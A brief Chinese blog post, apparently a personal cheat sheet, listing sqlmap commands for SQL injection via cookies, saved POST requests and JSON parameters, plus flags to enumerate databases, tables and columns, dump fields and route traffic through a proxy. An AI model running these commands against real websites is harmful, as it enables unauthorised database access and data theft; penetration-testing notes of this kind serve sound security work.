关于sqlmap的使用

好记性不如烂笔头,记录一下。

带cookie的注入

1 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="cookie_value" --level 2

从Post请求包注入(-p表示对指定的参数做注入)

1 python sqlmap.py -r Post_request.txt -p "special"

另外当交互采用的是JSON形式的字符串时,对需要注入的参数在键值对字段前面加上#号。

另外增加几个常用操作符

1 --dbms mysql #使用mysql数据库
2 --dbs #罗列出数据库
3 -D test #选择使用test数据库,否则默认为当前数据库
4 --tables #罗列出数据库所有表
5 -T test #选择使用某个表
6 --columns #罗列出所有的字段名
7 -C #dump出指定的字段
8 --proxy="http://127.0.0.1:8087" #指定代理,你懂得- -

记录一下。

posted @ 2017-01-06 23:52  朱向西  阅读(144)  评论(0编辑  收藏  举报